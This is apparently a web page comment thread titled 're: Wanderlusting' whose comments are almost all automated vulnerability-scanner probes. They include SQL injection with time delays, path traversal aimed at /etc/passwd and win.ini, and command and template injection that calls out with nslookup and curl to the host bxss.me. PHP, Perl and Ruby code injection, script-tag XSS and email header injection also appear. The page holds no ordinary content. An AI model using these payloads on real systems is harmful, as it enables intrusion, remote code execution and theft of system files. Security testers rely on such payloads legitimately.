-1 OR 2+662-662-1=0+0+0+1
re: Wanderlusting
1*
re: Wanderlusting
-1 OR 3+662-662-1=0+0+0+1
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
-1 OR 2+651-651-1=0+0+0+1
re: Wanderlusting
-1 OR 3+651-651-1=0+0+0+1
re: Wanderlusting
if(now()=sysdate(),sleep(15),0)
re: Wanderlusting
if(now()=sysdate(),sleep(15),0)
re: Wanderlusting
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Wanderlusting
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Wanderlusting
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Wanderlusting
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Wanderlusting
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Wanderlusting
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Wanderlusting
-1; waitfor delay '0:0:15' --
re: Wanderlusting
-1; waitfor delay '0:0:15' --
re: Wanderlusting
-1); waitfor delay '0:0:15' --
re: Wanderlusting
-1); waitfor delay '0:0:15' --
re: Wanderlusting
1 waitfor delay '0:0:15' --
re: Wanderlusting
1 waitfor delay '0:0:15' --
re: Wanderlusting
6lsVoX2V'; waitfor delay '0:0:15' --
re: Wanderlusting
04d6FJxv'; waitfor delay '0:0:15' --
re: Wanderlusting
-5 OR 237=(SELECT 237 FROM PG_SLEEP(15))--
re: Wanderlusting
-5 OR 969=(SELECT 969 FROM PG_SLEEP(15))--
re: Wanderlusting
-5) OR 203=(SELECT 203 FROM PG_SLEEP(15))--
re: Wanderlusting
-5) OR 500=(SELECT 500 FROM PG_SLEEP(15))--
re: Wanderlusting
-1)) OR 329=(SELECT 329 FROM PG_SLEEP(15))--
re: Wanderlusting
-1)) OR 163=(SELECT 163 FROM PG_SLEEP(15))--
re: Wanderlusting
u1rHn9VZ' OR 88=(SELECT 88 FROM PG_SLEEP(15))--
re: Wanderlusting
rEo1IUue' OR 109=(SELECT 109 FROM PG_SLEEP(15))--
re: Wanderlusting
ifmfQQUr') OR 249=(SELECT 249 FROM PG_SLEEP(15))--
re: Wanderlusting
M2V3YhER') OR 14=(SELECT 14 FROM PG_SLEEP(15))--
re: Wanderlusting
9UfxEmdD')) OR 663=(SELECT 663 FROM PG_SLEEP(15))--
re: Wanderlusting
cptKJgxf')) OR 925=(SELECT 925 FROM PG_SLEEP(15))--
re: Wanderlusting
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Wanderlusting
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Wanderlusting
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Wanderlusting
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Wanderlusting
'||(select 1 from (select pg_sleep(15))x)||'
re: Wanderlusting
'||(select 1 from (select pg_sleep(15))x)||'
re: Wanderlusting
''||(select 1 from (select pg_sleep(15))x)||''
re: Wanderlusting
1'"
re: Wanderlusting
@@rbST1
re: Wanderlusting
''||(select 1 from (select pg_sleep(15))x)||''
re: Wanderlusting
1'"
re: Wanderlusting
@@7KRdL
re: Wanderlusting
1bCHmlCNO
re: Wanderlusting
response.write(9036127*9871924)
re: Wanderlusting
'+response.write(9036127*9871924)+'
re: Wanderlusting
"+response.write(9036127*9871924)+"
re: Wanderlusting
../../../../../../../../../../../../../../etc/passwd
re: Wanderlusting
../../../../../../../../../../../../../../windows/win.ini
re: Wanderlusting
echo befecs$()\ vyfzxe\nz^xyu||a #' &echo befecs$()\ vyfzxe\nz^xyu||a #|" &echo befecs$()\ vyfzxe\nz^xyu||a #
re: Wanderlusting
file:///etc/passwd
re: Wanderlusting
&echo uayswv$()\ njwhln\nz^xyu||a #' &echo uayswv$()\ njwhln\nz^xyu||a #|" &echo uayswv$()\ njwhln\nz^xyu||a #
re: Wanderlusting
../../../../../../../../../../../../../../../proc/version
re: Wanderlusting
|echo yuzytc$()\ epiwgn\nz^xyu||a #' |echo yuzytc$()\ epiwgn\nz^xyu||a #|" |echo yuzytc$()\ epiwgn\nz^xyu||a #
re: Wanderlusting
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Wanderlusting
(nslookup hitttghbtgywub6e0f.bxss.me||perl -e "gethostbyname('hitttghbtgywub6e0f.bxss.me')")
re: Wanderlusting
../../../../../../../../../../etc/passwd%00.jpg
re: Wanderlusting
$(nslookup hitbtbbwlafpwe9e75.bxss.me||perl -e "gethostbyname('hitbtbbwlafpwe9e75.bxss.me')")
re: Wanderlusting
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Wanderlusting
&nslookup hitnjcjbscfjw3877f.bxss.me&'\"`0&nslookup hitnjcjbscfjw3877f.bxss.me&`'
re: Wanderlusting
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Wanderlusting
&(nslookup hitdynlniylwv4d68c.bxss.me||perl -e "gethostbyname('hitdynlniylwv4d68c.bxss.me')")&'\"`0&(nslookup hitdynlniylwv4d68c.bxss.me||perl -e "gethostbyname('hitdynlniylwv4d68c.bxss.me')")&`'
re: Wanderlusting
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Wanderlusting
|(nslookup hitpnvuzryins67a6c.bxss.me||perl -e "gethostbyname('hitpnvuzryins67a6c.bxss.me')")
re: Wanderlusting
/etc/passwd
re: Wanderlusting
`(nslookup hityuzrxzirut37ff6.bxss.me||perl -e "gethostbyname('hityuzrxzirut37ff6.bxss.me')")`
re: Wanderlusting
%2fetc%2fpasswd
re: Wanderlusting
;(nslookup hitnwsyvkzutmcc0f0.bxss.me||perl -e "gethostbyname('hitnwsyvkzutmcc0f0.bxss.me')")|(nslookup hitnwsyvkzutmcc0f0.bxss.me||perl -e "gethostbyname('hitnwsyvkzutmcc0f0.bxss.me')")&(nslookup hitnwsyvkzutmcc0f0.bxss.me||perl -e "gethostbyname('hitnwsyvkzutmcc0f0.bxss.me')")
re: Wanderlusting
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Wanderlusting
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Wanderlusting
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Wanderlusting
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Wanderlusting
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Wanderlusting
%0abcc:074625.67-14505.67.5ceaa.19990.2@bxss.me
re: Wanderlusting
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Wanderlusting
to@example.com>%0d%0abcc:074625.67-14506.67.5ceaa.19990.2@bxss.me
re: Wanderlusting
file:///etc/passwd
re: Wanderlusting
/\../\../\../\../\../\../\../etc/passwd
re: Wanderlusting
<esi:include src="http://bxss.me/rpb.png"/>
re: Wanderlusting
/WEB-INF/web.xml
re: Wanderlusting
C:\WINDOWS\system32\drivers\etc\hosts
re: Wanderlusting
../../../../../../../../../../windows/win.ini%00.jpg
re: Wanderlusting
${9999493+9999398}
re: Wanderlusting
/../../../../../../../../../../boot.ini
re: Wanderlusting
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Wanderlusting
..\..\..\..\..\..\..\..\windows\win.ini
re: Wanderlusting
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Wanderlusting
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Wanderlusting
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Wanderlusting
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Wanderlusting
)
re: Wanderlusting
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Wanderlusting
!(()&&!|*|*|
re: Wanderlusting
WEB-INF/web.xml
re: Wanderlusting
^(#$!@#$)(()))******
re: Wanderlusting
WEB-INF\web.xml
re: Wanderlusting
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Wanderlusting
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Wanderlusting
'.gethostbyname(lc('hittr'.'mohfusdhd98e1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(67).chr(103).chr(81).'
re: Wanderlusting
Http://bxss.me/t/fit.txt
re: Wanderlusting
".gethostbyname(lc("hitwu"."flmaxvob39e91.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(78).chr(118).chr(81)."
re: Wanderlusting
http://bxss.me/t/fit.txt%3F.jpg
re: Wanderlusting
/etc/shells
re: Wanderlusting
c:/windows/win.ini
re: Wanderlusting
bxss.me
re: Wanderlusting
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Wanderlusting
HttP://bxss.me/t/xss.html?%00
re: Wanderlusting
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Wanderlusting
bxss.me/t/xss.html?%00
re: Wanderlusting
"+"A".concat(70-3).concat(22*4).concat(97).concat(82).concat(107).concat(71)+(require"socket"
Socket.gethostbyname("hitvo"+"atcfocbsc8214.bxss.me.")[3].to_s)+"
re: Wanderlusting
';print(md5(31337));$a='
re: Wanderlusting
'+'A'.concat(70-3).concat(22*4).concat(102).concat(86).concat(103).concat(68)+(require'socket'
Socket.gethostbyname('hithr'+'ogvhyjxy36919.bxss.me.')[3].to_s)+'
re: Wanderlusting
";print(md5(31337));$a="
re: Wanderlusting
${@print(md5(31337))}
re: Wanderlusting
'"
re: Wanderlusting
${@print(md5(31337))}\
re: Wanderlusting
<!--
re: Wanderlusting
'.print(md5(31337)).'
re: Wanderlusting
1
re: Wanderlusting
1
re: Wanderlusting
-1 OR 2+860-860-1=0+0+0+1 --
re: Wanderlusting
-1 OR 3+860-860-1=0+0+0+1 --
re: Wanderlusting
-1 OR 2+174-174-1=0+0+0+1
re: Wanderlusting
-1 OR 3+174-174-1=0+0+0+1
re: Wanderlusting
-1' OR 2+394-394-1=0+0+0+1 --
re: Wanderlusting
-1' OR 3+394-394-1=0+0+0+1 --
re: Wanderlusting
-1' OR 2+578-578-1=0+0+0+1 or 'P74JArIO'='
re: Wanderlusting
-1' OR 3+578-578-1=0+0+0+1 or 'P74JArIO'='
re: Wanderlusting
-1" OR 2+901-901-1=0+0+0+1 --
re: Wanderlusting
-1" OR 3+901-901-1=0+0+0+1 --
re: Wanderlusting
if(now()=sysdate(),sleep(15),0)
re: Wanderlusting
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Wanderlusting
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Wanderlusting
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Wanderlusting
-1; waitfor delay '0:0:15' --
re: Wanderlusting
-1); waitfor delay '0:0:15' --
re: Wanderlusting
1 waitfor delay '0:0:15' --
re: Wanderlusting
slIuR6GX'; waitfor delay '0:0:15' --
re: Wanderlusting
-5 OR 268=(SELECT 268 FROM PG_SLEEP(15))--
re: Wanderlusting
-5) OR 420=(SELECT 420 FROM PG_SLEEP(15))--
re: Wanderlusting
-1)) OR 339=(SELECT 339 FROM PG_SLEEP(15))--
re: Wanderlusting
WWfW7bLJ' OR 401=(SELECT 401 FROM PG_SLEEP(15))--
re: Wanderlusting
6PmtQDMQ') OR 307=(SELECT 307 FROM PG_SLEEP(15))--
re: Wanderlusting
zbmSGHt6')) OR 126=(SELECT 126 FROM PG_SLEEP(15))--
re: Wanderlusting
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Wanderlusting
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Wanderlusting
'||(select 1 from (select pg_sleep(15))x)||'
re: Wanderlusting
''||(select 1 from (select pg_sleep(15))x)||''
re: Wanderlusting
1'"
re: Wanderlusting
@@NAwf7
re: Wanderlusting
1BETOB38OF0
re: Wanderlusting
response.write(9963409*9679547)
re: Wanderlusting
'+response.write(9963409*9679547)+'
re: Wanderlusting
"+response.write(9963409*9679547)+"
re: Wanderlusting
<esi:include src="http://bxss.me/rpb.png"/>
re: Wanderlusting
${9999500+10000357}
re: Wanderlusting
../../../../../../../../../../../../../../etc/passwd
re: Wanderlusting
../../../../../../../../../../../../../../windows/win.ini
re: Wanderlusting
file:///etc/passwd
re: Wanderlusting
../
re: Wanderlusting
)
re: Wanderlusting
!(()&&!|*|*|
re: Wanderlusting
^(#$!@#$)(()))******
re: Wanderlusting
redirtest.acx
re: Wanderlusting
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Wanderlusting
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Wanderlusting
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Wanderlusting
echo pqhdze$()\ gwgnrr\nz^xyu||a #' &echo pqhdze$()\ gwgnrr\nz^xyu||a #|" &echo pqhdze$()\ gwgnrr\nz^xyu||a #
re: Wanderlusting
/etc/shells
re: Wanderlusting
'.gethostbyname(lc('hitvq'.'kiuadhvade76e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(69).chr(106).chr(82).'
re: Wanderlusting
&echo woslfl$()\ tkblwy\nz^xyu||a #' &echo woslfl$()\ tkblwy\nz^xyu||a #|" &echo woslfl$()\ tkblwy\nz^xyu||a #
re: Wanderlusting
../../../../../../../../../../../../../../etc/shells
re: Wanderlusting
".gethostbyname(lc("hitdf"."mlfzknsic6802.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(85).chr(100).chr(86)."
re: Wanderlusting
|echo xpzodn$()\ pvoepr\nz^xyu||a #' |echo xpzodn$()\ pvoepr\nz^xyu||a #|" |echo xpzodn$()\ pvoepr\nz^xyu||a #
re: Wanderlusting
c:/windows/win.ini
re: Wanderlusting
gethostbyname(lc('hittw'.'agwtbozw04b29.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(73).chr(119).chr(74)
re: Wanderlusting
expr 9000425568 - 964789
re: Wanderlusting
bxss.me
re: Wanderlusting
(nslookup -q=cname hitctdhnizcps4037e.bxss.me||curl hitctdhnizcps4037e.bxss.me))
re: Wanderlusting
Http://bxss.me/t/fit.txt
re: Wanderlusting
$(nslookup -q=cname hitxsjwxwimeocd5f9.bxss.me||curl hitxsjwxwimeocd5f9.bxss.me)
re: Wanderlusting
http://bxss.me/t/fit.txt?.jpg
re: Wanderlusting
&nslookup -q=cname hituhrlwxmuxkdb3b4.bxss.me&'\"`0&nslookup -q=cname hituhrlwxmuxkdb3b4.bxss.me&`'
re: Wanderlusting
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Wanderlusting
HttP://bxss.me/t/xss.html?%00
re: Wanderlusting
&(nslookup -q=cname hitotboqlkfzgcb256.bxss.me||curl hitotboqlkfzgcb256.bxss.me)&'\"`0&(nslookup -q=cname hitotboqlkfzgcb256.bxss.me||curl hitotboqlkfzgcb256.bxss.me)&`'
re: Wanderlusting
';print(md5(31337));$a='
re: Wanderlusting
bxss.me/t/xss.html?%00
re: Wanderlusting
|(nslookup -q=cname hitbgfybrlxwu8615f.bxss.me||curl hitbgfybrlxwu8615f.bxss.me)
re: Wanderlusting
";print(md5(31337));$a="
re: Wanderlusting
`(nslookup -q=cname hitieharsaklmc77f4.bxss.me||curl hitieharsaklmc77f4.bxss.me)`
re: Wanderlusting
${@print(md5(31337))}
re: Wanderlusting
;(nslookup -q=cname hitbdrmfpwxbfa8542.bxss.me||curl hitbdrmfpwxbfa8542.bxss.me)|(nslookup -q=cname hitbdrmfpwxbfa8542.bxss.me||curl hitbdrmfpwxbfa8542.bxss.me)&(nslookup -q=cname hitbdrmfpwxbfa8542.bxss.me||curl hitbdrmfpwxbfa8542.bxss.me)
re: Wanderlusting
'"()
re: Wanderlusting
${@print(md5(31337))}\
re: Wanderlusting
|(nslookup${IFS}-q${IFS}cname${IFS}hitfwpctuoyhz13ebe.bxss.me||curl${IFS}hitfwpctuoyhz13ebe.bxss.me)
re: Wanderlusting
'&&sleep(27*1000)*tgynoq&&'
re: Wanderlusting
'.print(md5(31337)).'
re: Wanderlusting
&(nslookup${IFS}-q${IFS}cname${IFS}hithevtetlqbo4ce7b.bxss.me||curl${IFS}hithevtetlqbo4ce7b.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hithevtetlqbo4ce7b.bxss.me||curl${IFS}hithevtetlqbo4ce7b.bxss.me)&`'
re: Wanderlusting
"&&sleep(27*1000)*wuhhkj&&"
re: Wanderlusting
"+"A".concat(70-3).concat(22*4).concat(112).concat(88).concat(99).concat(73)+(require"socket"
Socket.gethostbyname("hitkv"+"dazcccvj131d3.bxss.me.")[3].to_s)+"
re: Wanderlusting
'||sleep(27*1000)*flbmel||'
re: Wanderlusting
'+'A'.concat(70-3).concat(22*4).concat(106).concat(72).concat(115).concat(75)+(require'socket'
Socket.gethostbyname('hitid'+'trlbwvfw2776e.bxss.me.')[3].to_s)+'
re: Wanderlusting
"||sleep(27*1000)*oaosdg||"
re: Wanderlusting
'A'.concat(70-3).concat(22*4).concat(111).concat(79).concat(110).concat(68)+(require'socket'
Socket.gethostbyname('hitmd'+'cydjrldgbd784.bxss.me.')[3].to_s)
re: Wanderlusting
replies
re: Wanderlusting
replies�
re: Wanderlusting
'"
re: Wanderlusting
replies/.
re: Wanderlusting
<!--
re: Wanderlusting
'"()&%<zzz><ScRiPt >k5NY(9189)</ScRiPt>
re: Wanderlusting
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitmvaitdmyqme0424.bxss.me")}}
re: Wanderlusting
'"()&%<zzz><ScRiPt >k5NY(9459)</ScRiPt>
re: Wanderlusting
9817345
re: Wanderlusting
sT9tOfEH
re: Wanderlusting
*1
re: Wanderlusting
*1
re: Wanderlusting
*1
re: Wanderlusting
*1
re: Wanderlusting
-1 OR 5*5=25 --
re: Wanderlusting
-1 OR 5*5=26 --
re: Wanderlusting
-1 OR 5*5=25
re: Wanderlusting
-1 OR 5*5=26
re: Wanderlusting
*if(now()=sysdate(),sleep(15),0)
re: Wanderlusting
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Wanderlusting
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Wanderlusting
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Wanderlusting
-1; waitfor delay '0:0:15' --
re: Wanderlusting
-1); waitfor delay '0:0:15' --
re: Wanderlusting
-1 waitfor delay '0:0:15' --
re: Wanderlusting
RVETYLQ8'; waitfor delay '0:0:15' --
re: Wanderlusting
-1 OR 557=(SELECT 557 FROM PG_SLEEP(15))--
re: Wanderlusting
-1) OR 582=(SELECT 582 FROM PG_SLEEP(15))--
